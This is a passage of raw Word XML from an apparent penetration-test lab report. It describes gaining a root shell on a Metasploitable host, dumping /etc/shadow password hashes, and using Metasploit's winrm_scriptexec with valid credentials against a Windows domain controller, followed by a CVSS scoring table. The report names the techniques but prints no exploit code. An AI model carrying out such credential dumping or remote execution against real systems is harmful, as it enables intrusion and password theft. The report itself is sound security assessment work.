          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 5: </w:t>
      </w:r>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Shell session was started; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> and id are used to verify that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=0(root) of the host was Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277483AD" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD78766" w14:textId="54DE3A5F" w:rsidR="00FB20AD" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Credential harvesting after exploitation was done through retrieving the file /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">/shadow, which has salted Unix password hashes of all the accounts of the local system. The outflow of this artefact is a direct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>materialisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the MITRE T1003 Credential Dumping technique and reflects the ability of an adversary to proceed to further offline cracking of passwords of the whole user account database [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787CCD9" w14:textId="74111174" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C2A5F7" wp14:editId="0365D05F">
            <wp:extent cx="5943600" cy="3529330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="195871584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8715840" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3529330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA9679" w14:textId="0CD9F5D6" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 6: </w:t>
      </w:r>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Terminal window with contents of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/Shadow file which are the result of Metasploitable root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB5A2D" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABF4F5B" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A35A35" w14:textId="28C00ADA" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.3 Exploit </w:t>
      </w:r>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Code Execution via Valid Credentials (T1021.006 / T1078)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8844A"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 xml:space="preserve">CVE / Risk Scoring — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Abuse (T1021.006 / T1078)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7787C6F9" w14:textId="6889B8F1" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Winrm_scriptexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit module is not assigned a CVE number because it does not affect a software vulnerability - it takes advantage of a legitimate service that is accessible but configured improperly and with valid authentication credentials. The risk is measured against the CVSS framework in the form of a configuration and credential weakness and aligned towards industry standards below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1944"/>
        <w:gridCol w:w="7406"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="69AABA95" w14:textId="77777777" w:rsidTr="000D3F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EE93239"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Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4338809C" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="297E885D" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55C4E522"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CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D971E9E"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N/A — credential-based abuse, no CVE assigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="6873D915" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76422017"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Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D5F70F"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Misconfiguration + Credential Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="225C3E06" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5BE447"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Affected Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="435155FA"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Windows Remote Management (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>), TCP 5985 (HTTP) / 5986 (HTTPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="0340ED5D" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47C43CBA"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Affected OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5A8F86"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Windows Server 2019 (Domain Controller, cs.org)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="3C5A223D" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CDEA88D"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CVSS v3.1 Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F52A07"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 xml:space="preserve">9.8 — CRITICAL </w:t>
            </w:r>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(analyst-assessed, no official NVD entry)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="45D0E4E3" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68E053E0"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CVSS v3.1 Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00FEB0CA"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CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>AC:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>PR:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>UI:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="796CD96F" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E9B872"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Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1655ECDF"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 xml:space="preserve">Network — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> accessible from attacker host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="02D9C535" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FDE80E4"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Attack Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7603978C"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Low — valid credentials suffice; no exploit code required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="39555726" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776F32BB"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Privileges Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFA1DC7"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None (credentials obtained in prior stage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="30FC7B36" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19FD3063"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User Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="213608CE"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None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="422DE199" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610F9F2E"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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5A9C60"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Changed — Domain Controller compromise affects entire cs.org domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="2864FC10" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7534726F"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Confidentiality</w:t>
            </w:r>
          </w:p>
